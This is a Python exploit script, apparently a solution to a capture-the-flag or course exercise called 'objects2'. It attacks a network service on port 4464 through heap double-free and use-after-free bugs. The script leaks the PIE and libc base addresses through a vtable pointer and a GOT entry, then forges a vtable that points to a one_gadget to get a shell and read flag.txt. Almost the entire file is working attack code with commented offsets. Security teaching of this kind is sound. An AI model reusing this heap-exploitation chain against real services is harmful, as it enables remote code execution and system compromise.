import sys
import struct
import socket

def p(a):
    return struct.pack('Q', a)

def recvline(s):
    b = b''
    while not b'\n' in b:
        b += s.recv(100)
    return b

def recvn(s, n):
    b = b''
    while len(b) < 8:
        b += s.recv(8 - len(b))
    return b

host = sys.argv[1] if len(sys.argv) > 1 else 'localhost'
port = 4464

# This is exactly the same program as object1, but it is compiled with all
# available protections. In particular, the binary is PIE and its load address
# is unknown.
# However, we can leverage its use-after-free and double-free bugs to leak
# all the addresses that we need. First we leak the executable load address,
# by reading the vtable pointer of one of the allocated objects, then we leak
# some GOT address, as usual.

# from objdump -d objects2 and looking at Base's constructor
Base_vtable_off = 0x2086 + 0x5bda
# readelf -r objects2 | grep exit
exit_got_off    = 0x7f78
# from nm -D libc.so.6 | grep '\<exit\>'
exit_libc_off   = 0x3e660
# from one_gadget libc.so.6
one_gadget_off  = 0xcbd20

# 1st phase: leak the EXE address
#
# We exploit a double-free vulnerability to leak the vtable of an object. 
s = socket.create_connection((host, port))
# create on object and delete it two times
s.send(b'oAb00')
recvline(s) # discard the reply
s.send(b'DA')
s.send(b'DA')
s.send(b'oBb00')  # this will overlap A
recvline(s)
s.send(b'cK08')   # and this too
recvline(s)
s.send(b'sK')     # this sends us the first 8 bytes of B, i.e., its vtable
Base_vtable = int.from_bytes(recvn(s, 8), 'little')

exe_base = Base_vtable - Base_vtable_off
print("exe load address:  %x" % exe_base)
s.send(b'q')
s.close()

# 2nd phase: leak the libc address
#
# We exploit the double-free again to overlay a value with part of the GOT.
# Because of the full RELRO, all the GOT entries are full. To prove the point,
# we leak the entry of exit, even if this function has not been called yet.
s = socket.create_connection((host, port))
# create an object and delete it two times
s.send(b'oAb00')
recvline(s)
s.send(b'DA')
s.send(b'DA')
s.send(b'cA08') # first reuse of A
recvline(s)
s.send(b'aA' + p(exe_base + exit_got_off - 16))
s.send(b'cB08') # copy the fake chunk pointer into the fastbin head
recvline(s)
s.send(b'cC08') # get the fake chunk
recvline(s)
s.send(b'sC')   # receive the exit entry of the GOT
exit_libc_addr = int.from_bytes(recvn(s, 8), 'little')

libc_base = exit_libc_addr - exit_libc_off
print("libc load address: %x" % libc_base)
s.send(b'q')
s.close()

one_gadget = libc_base + one_gadget_off

# from now on it is just like objects1
s = socket.create_connection((host, port))
# create a fake vtable pointing to the one_gadget
s.send(b'cV08')
vtable_addr = int(recvline(s).decode(), 0)
s.send(b'aV' + p(one_gadget))

# trigger the user-after-free bug
s.send(b'oAb00')
s.send(b'DA')
recvline(s)
s.send(b'cK16')
recvline(s)

# overwrite the A object with our fake vtable
s.send(b'aK' + p(vtable_addr) + p(0))

# use the overwritten object
s.send(b'uA')

# capture the flag
s.send(b'/bin/cat flag.txt\n')
sys.stdout.buffer.write(recvline(s))

